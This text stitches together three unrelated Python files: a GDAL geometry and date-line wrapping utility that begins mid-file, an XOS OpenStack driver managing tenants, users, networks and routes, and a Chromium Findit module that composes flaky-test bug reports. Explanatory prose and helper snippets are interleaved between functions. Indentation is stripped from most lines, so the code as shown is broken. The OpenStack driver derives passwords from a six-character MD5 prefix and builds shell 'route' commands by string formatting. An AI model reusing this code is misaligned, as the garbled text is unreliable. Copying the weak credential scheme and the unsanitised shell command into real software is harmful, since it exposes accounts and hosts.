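All three notations resolve to the same numeric code, which is what `parseSR` then feeds to `createSRFromEPSG`.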
def dumpSR(sr, delimiter="", debug=False):
# check whether geometry has a spatial reference
if sr is not None:
an, ac = (sr.GetAuthorityName(None), sr.GetAuthorityCode(None))
        if an == "EPSG" and ac and int(ac) > 0:
#out = "%s:%s%s"%(an, ac, delimiter)
out = "urn:ogc:def:crs:%s:6.3:%s"%(an, ac)
else:
print >>sys.stderr, "WARNING: Unsupported projection! %s"%(sr.ExportToWkt())
out = ""
else:
out = ""
return out
#-------------------------------------------------------------------------------
# File I/O subroutines
def parseGeom(buf, debug=False):
""" parse geometry from a source buffer """
# parse prefix
if buf.startswith("EPSG:") or buf.startswith("PROJCS["):
srs, _, buf = buf.partition(';')
sr = parseSR(srs)
else:
sr = None
# create the geometry
for loader in (ogr.CreateGeometryFromWkb,
ogr.CreateGeometryFromWkt,
ogr.CreateGeometryFromGML,
ogr.CreateGeometryFromJson):
try:
if debug:
print >>sys.stderr, "LOADER: ", loader,
geom = loader(buf)
except Exception as e:
if debug:
print >>sys.stderr, e
continue
if debug:
print >>sys.stderr, "OK"
break
else:
raise ValueError("ERROR: Failed to parse the source geometry!")
if sr is not None:
geom.AssignSpatialReference(sr)
return geom
#OUTPUT_FORMATS = ("WKB", "WKT", "JSON", "GML", "KML")
OUTPUT_FORMATS = ("WKB", "WKT", "JSON", "KML")
def dumpGeom(geom, format="WKB", debug=False):
""" dump geometry to a buffer possible formats are: WKB(*)|WKT|JSON|GML|KML """
# dump SRS prefix
prefix = dumpSR(geom.GetSpatialReference(), ";", debug)
if format == "WKB":
data = geom.ExportToWkb()
if prefix:
data = "%s%s"%(prefix, data)
elif format == "WKT":
data = "%s%s\n"%(prefix, geom.ExportToWkt())
elif format == "JSON":
data = geom.ExportToJson()
# the GML needs to be verified
# elif format == "GML":
# data = geom.ExportToGML()
elif format == "KML":
data = geom.ExportToKML()
else:
raise ValueError("Invalid format specification! FORMAT='%s'"%(format))
return data
#-------------------------------------------------------------------------------
def wrapArroundDateLine(geom, (xmin, ymin, xmax, ymax), nstep=200):
"""
    wrap (split) geometry around the date-line
nstep controls the split border segmentation (dy = (ymax-ymin)/nstep)
"""
xdif = xmax - xmin
step = (ymax - ymin) / nstep
x0, x1, _, _ = geom.GetEnvelope()
p_start = int(m.floor((x0-xmin)/xdif))
p_stop = int(m.ceil((x1-xmin)/xdif))
# skip geometries falling to a regular domain
if (p_start == 0) and (p_stop == 1):
return geom
# wrap-arround
lgeom = []
for p in xrange(p_start, p_stop):
offset = p*xdif
clip = getRectangle((xmin+offset, ymin, xmax+offset, ymax), step)
tmp = geom.Intersection(clip)
tmp = shiftGeom(tmp, (-offset, 0.0))
lgeom.extend(extractPolygons(tmp))
return groupPolygons(lgeom)
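The period-index arithmetic at the top of `wrapArroundDateLine` (the `p_start`/`p_stop` computation) can be isolated into a small helper for illustration; `period_span` is a hypothetical name. A result of `(0, 1)` corresponds to the "regular domain" fast path where the geometry is returned unchanged.

```python
import math

def period_span(x0, x1, xmin, xmax):
    """Indices of the periodic copies of [xmin, xmax] overlapped by [x0, x1]."""
    width = xmax - xmin
    p_start = int(math.floor((x0 - xmin) / width))
    p_stop = int(math.ceil((x1 - xmin) / width))
    return p_start, p_stop
```

An envelope crossing the date-line spans two periods, so the loop above clips once per period and shifts each piece back by `p * width`.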
def wrapArroundWGS84(geom, nstep=200):
"""
    longitude wrap-around of geometry in WGS84
    nstep controls the split border segmentation (dy = (ymax-ymin)/nstep)
    equivalent to:
wrapArroundDateLine(geom, (-180., -90., +180., +90.), nstep)
"""
return wrapArroundDateLine(geom, (-180., -90., +180., +90.), nstep)
#-------------------------------------------------------------------------------
def mapToWGS84(geom):
def between(v, (v0, v1)):
if v0 <= v1:
return (v0 <= v)and(v1 >= v)
        else: # v0 > v1
return (v1 <= v)and(v0 >= v)
def extent_contains(x0, y0):
return ((x0_min <= x0)and(x0_max >= x0)
and(y0_min <= y0)and(y0_max >= y0))
def generate_polar_section(north, east):
eps = 1e-9
        y00 = 89 # max. opposite-pole latitude distance from the equator
x0 = 0 if east else -180
y0 = (-y00) if north else (+y00)
y1 = (90-eps) if north else (eps-90)
lr = ogr.Geometry(type=ogr.wkbLinearRing)
for i in xrange(31):
lr.AddPoint_2D(i*6+x0, y0)
lr.AddPoint_2D(180+x0, y1)
lr.AddPoint_2D(x0, y1)
lr.AddPoint_2D(x0, y0)
p = ogr.Geometry(type=ogr.wkbPolygon)
p.AddGeometry(lr)
p.AssignSpatialReference(OSR_WGS84)
return p
def fix_dateline(geom, east):
        """fix the +/-180 deg ambiguity of the date-line nodes"""
def _dlflip_east((x, y, _)): # date-line point flipper
return (x+360.0 if x < -179.0 else x, y)
def _dlflip_west((x, y, _)): # date-line point flipper
return (x-360.0 if x > (+179.0) else x, y)
return Transfomer(_dlflip_east if east else _dlflip_west)(geom)
def transform_polar(north):
        # generate polygon splitting the polar geometry to halves
s1 = generate_polar_section(north, east=True)
s2 = generate_polar_section(north, east=False)
# transform coordinates
s1.Transform(ct_rev)
s2.Transform(ct_rev)
# split the polar geometry to halves
g1 = geom.Intersection(s1)
g2 = geom.Intersection(s2)
# transform halves to the target projection
g1.Transform(ct_fwd)
g2.Transform(ct_fwd)
# fix the dateline ambiguity
g1 = fix_dateline(g1, east=True)
g2 = fix_dateline(g2, east=False)
# return the unified geometry
return g1.Union(g2)
#--------------------------------------------------------------------------
sr_src = geom.GetSpatialReference()
sr_dst = OSR_WGS84
# coordinate transformation objects
ct_fwd = osr.CoordinateTransformation(sr_src, sr_dst)
ct_rev = osr.CoordinateTransformation(sr_dst, sr_src)
# envelope and centroid in the source coordinates
x0_min, x0_max, y0_min, y0_max = geom.GetEnvelope()
# centroid
x0_cnt, y0_cnt = 0.5*(x0_min+x0_max), 0.5*(y0_min+y0_max)
# try to get coordinates of the north and south pole in the source CRS
try:
xy0_np = ct_rev.TransformPoint(0.0, 90.0)[:2]
except RuntimeError:
xy0_np = None
try:
xy0_sp = ct_rev.TransformPoint(0.0, -90.0)[:2]
except RuntimeError:
xy0_sp = None
# case #1 - extent contains the north pole
if xy0_np and extent_contains(*xy0_np):
return setSR(transform_polar(north=True), OSR_WGS84)
# case #2 - extent contains the south pole
# check whether the extent contains the south pole
elif xy0_sp and extent_contains(*xy0_sp):
return setSR(transform_polar(north=False), OSR_WGS84)
# case #3 proceed with the date-line handling
# perform transformation
geom.Transform(ct_fwd)
# get extent and centroid in the target coordinates
x1_min, _, _ = ct_fwd.TransformPoint(x0_min, y0_cnt)
x1_max, _, _ = ct_fwd.TransformPoint(x0_max, y0_cnt)
x1_cnt, _, _ = ct_fwd.TransformPoint(x0_cnt, y0_cnt)
    # fix the wild easting wrap-around
if not between(x1_cnt, (x1_min, x1_max)):
if x1_max < x1_min: # axis orientation preserved
x_cnt, x_min, x_max = x1_cnt, x1_min, x1_max
else: # (x1_min < x1_max) # flipped axis orientation
x_cnt, x_min, x_max = x1_cnt, x1_max, x1_min
        # point unwrapping functions
if x_cnt < x_max: # EAST to WEST
def _dlflip(p):
return (p[0]-360*(p[0] > x_max), p[1])
elif x_cnt > x_min: # WEST to EAST
def _dlflip(p):
return (p[0]+360*(p[0] < x_min), p[1])
geom = setSR(Transfomer(_dlflip)(geom), OSR_WGS84)
    # perform proper wrap-around
return setSR(wrapArroundDateLine(geom, (-180, -90, 180, 90), 1), OSR_WGS84)
#-------------------------------------------------------------------------------
def groupPolygons(plist):
""" group polygons to a multi-polygon """
mp = ogr.Geometry(ogr.wkbMultiPolygon)
for p in plist:
mp.AddGeometry(p)
return mp
def ungroupMultiPolygon(mpol):
    """ un-group a multi-polygon to a list of polygons """
return [mpol.GetGeometryRef(i) for | |
import commands
import hashlib
from xos.config import Config
from core.models import Controller
try:
from openstack.client import OpenStackClient
has_openstack = True
except ImportError:
has_openstack = False
manager_enabled = Config().api_nova_enabled
class OpenStackDriver:
def __init__(self, config = None, client=None):
if config:
self.config = Config(config)
else:
self.config = Config()
if client:
self.shell = client
self.enabled = manager_enabled
self.has_openstack = has_openstack
self.controller = None
self.admin_user = None
def client_driver(self, caller=None, tenant=None, controller=None):
if caller:
auth = {'username': caller.email,
'password': hashlib.md5(caller.password).hexdigest()[:6],
'tenant': tenant}
client = OpenStackClient(controller=controller, cacert=self.config.nova_ca_ssl_cert, **auth)
else:
admin_driver = self.admin_driver(tenant=tenant, controller=controller)
client = OpenStackClient(tenant=tenant, controller=admin_driver.controller)
driver = OpenStackDriver(client=client)
#driver.admin_user = admin_driver.admin_user
#driver.controller = admin_driver.controller
return driver
def admin_driver(self, tenant=None, controller=None):
        if isinstance(controller, int):
            controller = Controller.objects.get(id=controller)
client = OpenStackClient(tenant=tenant, controller=controller, cacert=self.config.nova_ca_ssl_cert)
driver = OpenStackDriver(client=client)
driver.admin_user = client.keystone.users.find(name=controller.admin_user)
driver.controller = controller
return driver
def create_role(self, name):
roles = self.shell.keystone.roles.findall(name=name)
roles_title = self.shell.keystone.roles.findall(name=name.title())
roles_found = roles + roles_title
if not roles_found:
role = self.shell.keystone.roles.create(name)
else:
role = roles_found[0]
return role
def delete_role(self, filter):
roles = self.shell.keystone.roles.findall(**filter)
for role in roles:
self.shell.keystone.roles.delete(role)
return 1
def create_tenant(self, tenant_name, enabled, description):
"""Create keystone tenant. Suggested fields: name, description, enabled"""
tenants = self.shell.keystone.tenants.findall(name=tenant_name)
if not tenants:
fields = {'tenant_name': tenant_name, 'enabled': enabled,
'description': description}
tenant = self.shell.keystone.tenants.create(**fields)
else:
tenant = tenants[0]
# always give the admin user the admin role to any tenant created
# by the driver.
self.add_user_role(self.admin_user.id, tenant.id, 'admin')
return tenant
def update_tenant(self, id, **kwds):
return self.shell.keystone.tenants.update(id, **kwds)
def delete_tenant(self, id):
ctx = self.shell.nova_db.ctx
tenants = self.shell.keystone.tenants.findall(id=id)
for tenant in tenants:
# nova does not automatically delete the tenant's instances
            # so we manually delete instances before deleting the tenant
instances = self.shell.nova_db.instance_get_all_by_filters(ctx,
{'project_id': tenant.id}, 'id', 'asc')
client = OpenStackClient(tenant=tenant.name)
driver = OpenStackDriver(client=client)
for instance in instances:
driver.destroy_instance(instance.id)
self.shell.keystone.tenants.delete(tenant)
return 1
def create_user(self, name, email, password, enabled):
users = self.shell.keystone.users.findall(email=email)
if not users:
fields = {'name': name, 'email': email, 'password': password,
'enabled': enabled}
user = self.shell.keystone.users.create(**fields)
else:
user = users[0]
return user
def delete_user(self, id):
users = self.shell.keystone.users.findall(id=id)
for user in users:
# delete users keys
keys = self.shell.nova.keypairs.findall()
for key in keys:
self.shell.nova.keypairs.delete(key)
self.shell.keystone.users.delete(user)
return 1
def get_admin_role(self):
role = None
for admin_role_name in ['admin', 'Admin']:
roles = self.shell.keystone.roles.findall(name=admin_role_name)
if roles:
role = roles[0]
break
return role
def add_user_role(self, kuser_id, tenant_id, role_name):
user = self.shell.keystone.users.find(id=kuser_id)
tenant = self.shell.keystone.tenants.find(id=tenant_id)
# admin role can be lowercase or title. Look for both
role = None
if role_name.lower() == 'admin':
role = self.get_admin_role()
else:
            # look up non-admin role or force exception when admin role isn't found
role = self.shell.keystone.roles.find(name=role_name)
role_found = False
user_roles = user.list_roles(tenant.id)
for user_role in user_roles:
if user_role.name == role.name:
role_found = True
if not role_found:
tenant.add_user(user, role)
return 1
def delete_user_role(self, kuser_id, tenant_id, role_name):
user = self.shell.keystone.users.find(id=kuser_id)
tenant = self.shell.keystone.tenants.find(id=tenant_id)
# admin role can be lowercase or title. Look for both
role = None
if role_name.lower() == 'admin':
role = self.get_admin_role()
else:
            # look up non-admin role or force exception when admin role isn't found
role = self.shell.keystone.roles.find(name=role_name)
role_found = False
user_roles = user.list_roles(tenant.id)
for user_role in user_roles:
if user_role.name == role.name:
role_found = True
if role_found:
tenant.remove_user(user, role)
return 1
def update_user(self, id, fields):
if 'password' in fields:
self.shell.keystone.users.update_password(id, fields['password'])
if 'enabled' in fields:
self.shell.keystone.users.update_enabled(id, fields['enabled'])
return 1
def create_router(self, name, set_gateway=True):
routers = self.shell.quantum.list_routers(name=name)['routers']
if routers:
router = routers[0]
else:
router = self.shell.quantum.create_router({'router': {'name': name}})['router']
# add router to external network
if set_gateway:
nets = self.shell.quantum.list_networks()['networks']
for net in nets:
if net['router:external'] == True:
self.shell.quantum.add_gateway_router(router['id'],
{'network_id': net['id']})
return router
def delete_router(self, id):
routers = self.shell.quantum.list_routers(id=id)['routers']
for router in routers:
self.shell.quantum.delete_router(router['id'])
        # remove router from external network
#nets = self.shell.quantum.list_networks()['networks']
#for net in nets:
# if net['router:external'] == True:
# self.shell.quantum.remove_gateway_router(router['id'])
def add_router_interface(self, router_id, subnet_id):
router = self.shell.quantum.show_router(router_id)['router']
subnet = self.shell.quantum.show_subnet(subnet_id)['subnet']
if router and subnet:
self.shell.quantum.add_interface_router(router_id, {'subnet_id': subnet_id})
def delete_router_interface(self, router_id, subnet_id):
router = self.shell.quantum.show_router(router_id)
subnet = self.shell.quantum.show_subnet(subnet_id)
if router and subnet:
self.shell.quantum.remove_interface_router(router_id, {'subnet_id': subnet_id})
def create_network(self, name, shared=False):
nets = self.shell.quantum.list_networks(name=name)['networks']
if nets:
net = nets[0]
else:
net = self.shell.quantum.create_network({'network': {'name': name, 'shared': shared}})['network']
return net
def delete_network(self, id):
nets = self.shell.quantum.list_networks()['networks']
for net in nets:
if net['id'] == id:
# delete_all ports
self.delete_network_ports(net['id'])
# delete all subnets:
for subnet_id in net['subnets']:
self.delete_subnet(subnet_id)
self.shell.quantum.delete_network(net['id'])
return 1
def delete_network_ports(self, network_id):
ports = self.shell.quantum.list_ports()['ports']
for port in ports:
if port['network_id'] == network_id:
self.shell.quantum.delete_port(port['id'])
return 1
def delete_subnet_ports(self, subnet_id):
ports = self.shell.quantum.list_ports()['ports']
for port in ports:
delete = False
for fixed_ip in port['fixed_ips']:
if fixed_ip['subnet_id'] == subnet_id:
delete=True
break
if delete:
self.shell.quantum.delete_port(port['id'])
return 1
def create_subnet(self, name, network_id, cidr_ip, ip_version, start, end):
#nets = self.shell.quantum.list_networks(name=network_name)['networks']
#if not nets:
# raise Exception, "No such network: %s" % network_name
#net = nets[0]
subnet = None
subnets = self.shell.quantum.list_subnets()['subnets']
for snet in subnets:
if snet['cidr'] == cidr_ip and snet['network_id'] == network_id:
subnet = snet
if not subnet:
# HACK: Add metadata route -- Neutron does not reliably supply this
metadata_ip = cidr_ip.replace("0/24", "3")
allocation_pools = [{'start': start, 'end': end}]
subnet = {'subnet': {'name': name,
'network_id': network_id,
'ip_version': ip_version,
'cidr': cidr_ip,
#'dns_nameservers': ['8.8.8.8', '8.8.4.4'],
'host_routes': [{'destination':'169.254.169.254/32','nexthop':metadata_ip}],
'gateway_ip': None,
'allocation_pools': allocation_pools}}
subnet = self.shell.quantum.create_subnet(subnet)['subnet']
# self.add_external_route(subnet)
return subnet
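The `cidr_ip.replace("0/24", "3")` hack above only works for /24 subnets ending in `.0`. Assuming the convention that the metadata host sits at the fourth address of the subnet, a more general derivation using the Python 3 `ipaddress` module might look like this (a sketch; `metadata_ip` is a hypothetical helper, not part of this driver):

```python
import ipaddress

def metadata_ip(cidr):
    """Fourth address of the subnet, e.g. '10.1.2.0/24' -> '10.1.2.3'."""
    # indexing an ip_network yields its addresses in order;
    # index 0 is the network address itself
    return str(ipaddress.ip_network(cidr)[3])
```

Unlike the string replace, this works for any prefix length and any network address, as long as the "+3" convention holds.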
def update_subnet(self, id, fields):
return self.shell.quantum.update_subnet(id, fields)
def delete_subnet(self, id):
#return self.shell.quantum.delete_subnet(id=id)
# inefficient but fault tolerant
subnets = self.shell.quantum.list_subnets()['subnets']
for subnet in subnets:
if subnet['id'] == id:
self.delete_subnet_ports(subnet['id'])
self.shell.quantum.delete_subnet(id)
self.delete_external_route(subnet)
return 1
def get_external_routes(self):
status, output = commands.getstatusoutput('route')
routes = output.split('\n')[3:]
return routes
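Note that the `commands` module used above is Python 2-only; `subprocess.getstatusoutput` is the Python 3 drop-in replacement. The header-skipping parse can also be isolated for testing — an illustrative sketch (not from the original file):

```python
def parse_route_output(output):
    # `route` prints two title lines and a column-header line before the
    # actual routing entries, hence the [3:] slice mirrored from above
    return output.split('\n')[3:]

assert parse_route_output("t1\nt2\nheader\nr1\nr2") == ["r1", "r2"]
```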
def add_external_route(self, subnet, routes=None):  # avoid a mutable default argument
if not routes:
routes = self.get_external_routes()
ports = self.shell.quantum.list_ports()['ports']
gw_ip = subnet['gateway_ip']
subnet_id = subnet['id']
# 1. Find the port associated with the subnet's gateway
# 2. Find the router associated with that port
# 3. Find the port associated with this router and on the external net
# 4. Set up route to the subnet through the port from step 3
ip_address = None
for port in ports:
for fixed_ip in port['fixed_ips']:
if fixed_ip['subnet_id'] == subnet_id and fixed_ip['ip_address'] == gw_ip:
gw_port = port
router_id = gw_port['device_id']
router = self.shell.quantum.show_router(router_id)['router']
if router and router.get('external_gateway_info'):
ext_net = router['external_gateway_info']['network_id']
for port in ports:
if port['device_id'] == router_id and port['network_id'] == ext_net:
ip_address = port['fixed_ips'][0]['ip_address']
if ip_address:
# check if external route already exists
route_exists = False
if routes:
for route in routes:
if subnet['cidr'] in route and ip_address in route:
route_exists = True
if not route_exists:
cmd = "route add -net %s dev br-ex gw %s" % (subnet['cidr'], ip_address)
s, o = commands.getstatusoutput(cmd)
#print cmd, "\n", s, o
return 1
def delete_external_route(self, subnet):
ports = self.shell.quantum.list_ports()['ports']
gw_ip = subnet['gateway_ip']
subnet_id = subnet['id']
# 1. Find the port associated with the subnet's gateway
# 2. Find the router associated with that port
# 3. Find the port associated with this router and on the external net
# 4. Set up route to the subnet through the port from step 3
ip_address = None
for port in ports:
for fixed_ip in port['fixed_ips']:
if fixed_ip['subnet_id'] == subnet_id and fixed_ip['ip_address'] == gw_ip:
gw_port = port
router_id = gw_port['device_id']
router = self.shell.quantum.show_router(router_id)['router']
ext_net = router['external_gateway_info']['network_id']
for port in ports:
if port['device_id'] == router_id and port['network_id'] == ext_net:
ip_address = port['fixed_ips'][0]['ip_address']
if ip_address:
cmd = "route delete -net %s" % (subnet['cidr'])
commands.getstatusoutput(cmd)
return 1
def create_keypair(self, name, public_key):
keys = self.shell.nova.keypairs.findall(name=name)
if keys:
key = keys[0]
# update key
if key.public_key != public_key:
self.delete_keypair(key.id)
key = self.shell.nova.keypairs.create(name=name, public_key=public_key)
else:
key = self.shell.nova.keypairs.create(name=name, public_key=public_key)
return key
def delete_keypair(self, id):
keys = self.shell.nova.keypairs.findall(id=id)
for key in keys:
self.shell.nova.keypairs.delete(key)
return 1
def get_private_networks(self, tenant=None):
if not tenant:
tenant = self.shell.nova.tenant
tenant = self.shell.keystone.tenants.find(name=tenant)
search_opts = {"tenant_id": tenant.id, "shared": False}
private_networks = self.shell.quantum.list_networks(**search_opts)
return private_networks
def get_shared_networks(self):
search_opts = {"shared": True}
shared_networks = self.shell.quantum.list_networks(**search_opts)
return shared_networks
def get_network_subnet(self, network_id):
subnet_id = None
subnet = None
if network_id:
os_networks = self.shell.quantum.list_networks(id=network_id)["networks"]
if os_networks:
os_network = os_networks[0]
if | |
<gh_stars>1-10
# Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Utilities to generate content of bugs to be logged."""
import abc
import textwrap
from google.appengine.ext import ndb
from gae_libs.appengine_util import IsStaging
from model import entity_util
from model.flake.flake import DEFAULT_COMPONENT
from model.flake.flake import Flake
from model.flake.flake_issue import FlakeIssue
from monorail_api import CustomizedField
from services import build_url
from services import git
from services import issue_constants
from services import monitoring
from services import swarming
# TODO(crbug.com/902408): Once underlying data models for Flake, FlakeIssue,
# MasterFlakeAnalysis, etc. are updated to associate with each other for bug
# deduplication on a 1-bug-per-culprit level, FlakyTestIssueGenerator,
# FlakeAnalysisIssueGenerator, and FlakeDetectionIssueGenerator should all be
# merged into a single bug-filing entry point capable of handling the various
# bug updates.
# The link to the flake culprit page to encapsulate all impacted analyses by
# a common culprit.
_CULPRIT_LINK_TEMPLATE = ('https://analysis.chromium.org'
'/p/chromium/flake-portal/analysis/culprit?key={}')
# The base template for updating a bug with culprit findings.
_RESULT_WITH_CULPRIT_TEMPLATE = textwrap.dedent("""
Findit identified the culprit r{commit_position} as introducing flaky test(s)
summarized in {culprit_link}
Please revert the culprit or disable the test(s) asap. If you are the owner,
please fix!
If the culprit above is wrong, please file a bug using this link:
{wrong_result_link}
Automatically posted by the findit-for-me app (https://goo.gl/6D5FZh).""")
# The link to include with bug updates about wrong findings for users to
# report.
_WRONG_CULPRIT_LINK_TEMPLATE = (
'https://bugs.chromium.org/p/chromium/issues/entry?'
'status=Unconfirmed&'
'labels=Pri-1,Test-Findit-Wrong&'
'components=Infra%3ETest%3EFlakiness&'
'summary=%5BFindit%5D%20Flake%20Analyzer%20-%20Wrong%20culprit%20'
'r{commit_position}&comment=Link%20to%20Culprit%3A%20{culprit_link}')
# The base template for completed analyses without findings. Currently not yet
# used as analyses without findings don't update bugs.
# TODO(crbug.com/902408): Still update bugs when there are no findings so
# sheriffs or developers can disable or delete tests at their discretion.
_UNKNOWN_CULPRIT_TEMPLATE = textwrap.dedent("""
Flaky test: {test_name}
Sample failed build due to flakiness: {build_link}
Test output log: {test_output_log_link}
Analysis: {analysis_link}
This flake is either longstanding, has low flakiness, or is not reproducible.
Automatically posted by the findit-for-me app (https://goo.gl/6D5FZh).""")
# Flake detection bug templates.
_FLAKE_DETECTION_BUG_DESCRIPTION = textwrap.dedent("""
{test_name} is flaky.
Findit has detected {num_occurrences} flake occurrences of this test within the
past 24 hours. List of all flake occurrences can be found at:
{flake_url}.
Unless the culprit CL is found and reverted, please disable this test first
within 30 minutes then find an appropriate owner.
{previous_tracking_bug_text}
{footer}""")
# The base template for a detected flaky test before analysis.
_FLAKE_DETECTION_BUG_COMMENT = textwrap.dedent("""
{test_name} is flaky.
Findit has detected {num_occurrences} new flake occurrences of this test. List
of all flake occurrences can be found at:
{flake_url}.
{back_onto_sheriff_queue_message}
{previous_tracking_bug_text}
{footer}""")
_FLAKE_DETECTION_WRONG_RESULTS_BUG_LINK = (
'https://bugs.chromium.org/p/chromium/issues/entry?'
'status=Unconfirmed&labels=Pri-1,Test-Findit-Wrong&'
'components=Infra%3ETest%3EFlakiness&'
'summary=%5BFindit%5D%20Flake%20Detection%20-%20Wrong%20result%3A%20'
'{summary}&comment=Link%20to%20flake%20details%3A%20{flake_link}')
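As an aside (not part of the original module), the percent-escapes hard-coded in the link templates above can be produced with `urllib.parse.quote` instead of being written by hand:

```python
from urllib.parse import quote

# '[' -> %5B, ']' -> %5D, ' ' -> %20, matching the literals in the templates
assert quote('[Findit] Flake') == '%5BFindit%5D%20Flake'
```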
_FLAKE_DETECTION_PREVIOUS_TRACKING_BUG = (
'\nThis flaky test was previously tracked in bug {}.\n')
_FLAKE_DETECTION_FOOTER_TEMPLATE = textwrap.dedent(
"""If the result above is wrong, please file a bug using this link:
{wrong_results_bug_link}
Automatically posted by the findit-for-me app (https://goo.gl/Ne6KtC).""")
############### Below are bug templates for flake groups. ###############
# Bug template for a group of detected flakes.
_FLAKE_DETECTION_GROUP_BUG_DESCRIPTION = textwrap.dedent("""
Tests in {canonical_step_name} are flaky.
Findit has detected {num_occurrences} flake occurrences of tests below within
the past 24 hours:
{flake_list}
Please try to find and revert the culprit if the culprit is obvious.
Otherwise please find an appropriate owner.
{previous_tracking_bug_text}
""")
# Template for the comment immediately after the bug is created.
_FLAKE_DETECTION_GROUP_BUG_LINK_COMMENT = textwrap.dedent("""
List of all flake occurrences can be found at:
{flakes_url}.
{footer}""")
_BACK_ONTO_SHERIFF_QUEUE_MESSAGE = (
'Since these tests are still flaky, this issue has been moved back onto the'
' Sheriff Bug Queue if it hasn\'t already.')
_FLAKE_DETECTION_GROUP_BUG_COMMENT = textwrap.dedent("""
Findit has detected {num_occurrences} new flake occurrences of tests in this bug
within the past 24 hours.
List of all flake occurrences can be found at:
{flake_url}.
{back_onto_sheriff_queue_message}
{previous_tracking_bug_text}
{footer}""")
_DUPLICATE_FLAKE_BUG_COMMENT = textwrap.dedent("""
This flake has been identified as being introduced in r{commit_position}.
See {culprit_url} for details.
In the case that Findit's finding is wrong, please unmerge the bug.
""")
def _GenerateAnalysisLink(analysis):
"""Returns a link to Findit's result page of a MasterFlakeAnalysis."""
return ('https://analysis.chromium.org'
'/p/chromium/flake-portal/analysis/culprit?key={}').format(
analysis.key.urlsafe())
def _GenerateCulpritLink(culprit_urlsafe_key):
"""Returns a link to a FlakeCulprit page."""
return _CULPRIT_LINK_TEMPLATE.format(culprit_urlsafe_key)
def _GenerateWrongCulpritLink(culprit):
"""Returns the test with a link to file a bug agasinst a wrong result."""
return _WRONG_CULPRIT_LINK_TEMPLATE.format(
commit_position=culprit.commit_position,
culprit_link=_GenerateCulpritLink(culprit.key.urlsafe()))
def _GenerateTestOutputLogLink(analysis):
"""Generates a link to the swarming task to be surfaced to the bug.
Args:
analysis (MasterFlakeAnalysis): The analysis whose data points and swarming
tasks will be queried for surfacing to the bug.
Returns:
url (str): The url to the swarming task.
"""
task_id = analysis.GetRepresentativeSwarmingTaskId()
assert task_id, 'Representative task id unexpectedly not found!'
return swarming.GetSwarmingTaskUrl(task_id)
def _GenerateMessageText(analysis):
"""Generates the text to create or update a bug with depending on results.
Args:
analysis (MasterFlakeAnalysis): The completed analysis with results to
determine what to update the bug with.
Returns:
(str): The text to update the bug with.
"""
# Culprit identified.
if analysis.culprit_urlsafe_key:
culprit = ndb.Key(urlsafe=analysis.culprit_urlsafe_key).get()
assert culprit, 'Culprit is unexpectedly missing.'
culprit_link = _GenerateCulpritLink(analysis.culprit_urlsafe_key)
wrong_result_link = _GenerateWrongCulpritLink(culprit)
return _RESULT_WITH_CULPRIT_TEMPLATE.format(
commit_position=culprit.commit_position,
culprit_link=culprit_link,
wrong_result_link=wrong_result_link)
# Culprit not identified.
analysis_link = _GenerateAnalysisLink(analysis)
build_link = build_url.CreateBuildUrl(analysis.original_master_name,
analysis.original_builder_name,
analysis.original_build_number)
test_output_log_link = _GenerateTestOutputLogLink(analysis)
return _UNKNOWN_CULPRIT_TEMPLATE.format(
test_name=analysis.original_test_name,
build_link=build_link,
test_output_log_link=test_output_log_link,
analysis_link=analysis_link)
def _GetAutoAssignOwner(analysis):
"""Determines the best owner for the culprit of an analysis.
Rules for determining an owner:
1. None if no culprit.
2. Return the culprit CL author if @chromium.org or @google.com
3. TODO(crbug.com/913032): Fall back to the reviewer(s) and check for
@chromium.org or @google.com.
Args:
analysis (MasterFlakeAnalysis): The analysis whose results are to be
used to update the bug.
Returns:
owner (str): The best-guess owner or None if not determined.
"""
if not analysis.culprit_urlsafe_key:
# No culprit, so no owner.
return None
culprit = entity_util.GetEntityFromUrlsafeKey(analysis.culprit_urlsafe_key)
assert culprit, (
'Culprit missing unexpectedly when trying to get owner for bug!')
author = git.GetAuthor(culprit.revision)
if not author:
return None
email = author.email
if email.endswith('@chromium.org') or email.endswith('@google.com'):
return email
return None
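A small aside (not part of the original module): `str.endswith` accepts a tuple, so the two-domain check above can be collapsed into one call. The constant name below is an assumption for illustration:

```python
TRUSTED_DOMAINS = ('@chromium.org', '@google.com')  # hypothetical constant

assert 'dev@google.com'.endswith(TRUSTED_DOMAINS)
assert not 'dev@example.com'.endswith(TRUSTED_DOMAINS)
```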
def GenerateDuplicateComment(culprit):
return _DUPLICATE_FLAKE_BUG_COMMENT.format(
commit_position=culprit.commit_position,
culprit_url=_CULPRIT_LINK_TEMPLATE.format(culprit.key.urlsafe()))
class BaseFlakeIssueGenerator(object):
"""Encapsulates details needed to create or update a Monorail issue."""
__metaclass__ = abc.ABCMeta
def __init__(self):
"""Initiates a BaseFlakeIssueGenerator object."""
# Id of the previous issue that was tracking this flaky test.
self._previous_tracking_bug_id = None
@abc.abstractmethod
def GetDescription(self):
"""Gets description for the issue to be created.
Returns:
A string representing the description.
"""
return
@abc.abstractmethod
def GetComment(self):
"""Gets a comment to post an update to the issue.
Returns:
A string representing the comment.
"""
return
@abc.abstractmethod
def ShouldRestoreChromiumSheriffLabel(self):
"""Returns True if the Sheriff label should be restored when updating bugs.
This value should be set based on whether the results of the service are
actionable. For example, for Flake Detection, once it detects new
occurrences of a flaky test, it is immediately actionable that Sheriffs
should disable the test ASAP. However, for Flake Analyzer, when the
confidence is low, the analysis results mostly only serve as FYI
information, so it would be too noisy to notify Sheriffs on every bug.
Returns:
A boolean indicating whether the Sheriff label should be restored.
"""
return
@abc.abstractmethod
def GetLabels(self):
"""Gets labels for the issue to be created.
Returns:
A list of strings representing the labels.
"""
return
def _GetCommonFlakyTestLabel(self):
"""Returns a list of comment labels used for flaky tests related issues.
Args:
A list of string representing the labels.
"""
return [
issue_constants.SHERIFF_CHROMIUM_LABEL, issue_constants.TYPE_BUG_LABEL,
issue_constants.FLAKY_TEST_LABEL
]
def GetAutoAssignOwner(self):
"""Gets the owner to assign the issue to.
Can be None, in which case the owner field should not be affected.
"""
return None
def GetComponents(self):
"""Gets the components of reported flakes."""
return []
def GetStatus(self):
"""Gets status for the issue to be created.
Returns:
A string representing the status, for example: Untriaged.
"""
return 'Untriaged'
@abc.abstractmethod
def GetSummary(self):
"""Gets summary for the issue to be created.
Returns:
A string representing the summary.
"""
return
@abc.abstractmethod
def GetFlakyTestCustomizedField(self):
"""Gets customized fields for the issue to be created.
Returns:
A CustomizedField field.
"""
return
def GetPriority(self):
"""Gets priority for the issue to be created.
Defaults to P1 for all flaky tests related bugs.
Returns:
A string representing the priority of the issue (e.g. Pri-1, Pri-2).
"""
return 'Pri-1'
def GetMonorailProject(self):
